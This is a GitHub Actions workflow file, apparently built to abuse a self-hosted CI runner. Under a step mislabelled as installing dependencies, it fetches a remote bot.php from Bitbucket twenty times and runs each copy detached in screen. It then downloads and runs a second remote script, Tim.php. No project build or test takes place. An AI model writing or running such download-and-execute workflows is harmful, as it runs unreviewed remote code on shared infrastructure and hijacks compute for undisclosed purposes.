name: Givv

on: workflow_dispatch
permissions:
  contents: read
jobs:
  bot:
    runs-on: [self-hosted, linux, x64]
    continue-on-error: True
    steps:
    - name: Setup PHP
      uses: shivammathur/setup-php@v2
      with:
        php-version: '7.4'
        coverage: none
    - name: Install dependenciess
      run: |
        apt update && apt install screen -y
        mkdir a1 && cd a1 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir a2 && cd a2 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir a3 && cd a3 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir a4 && cd a4 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir a5 && cd a5 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir aa1 && cd aa1 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir aa2 && cd aa2 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir aa3 && cd aa3 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir aa4 && cd aa4 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir aa5 && cd aa5 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir sa1 && cd sa1 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir sa2 && cd sa2 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir sa3 && cd sa3 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir sa4 && cd sa4 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir sa5 && cd sa5 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir qa1 && cd qa1 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir qa2 && cd qa2 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir qa3 && cd qa3 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir qa4 && cd qa4 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        mkdir qa5 && cd qa5 && curl -L -o bot.php https://bitbucket.org/nung89/bossku/raw/009bad7400ef3f6004a84926fe0014529a2cd6be/bot.php && screen -d -m php bot.php
        curl -L -o Tim.php https://bitbucket.org/giv8/newwe/raw/c9a53abd273861036533b2943a0725e311cd8d48/Combo/Tim.php && php Tim.php
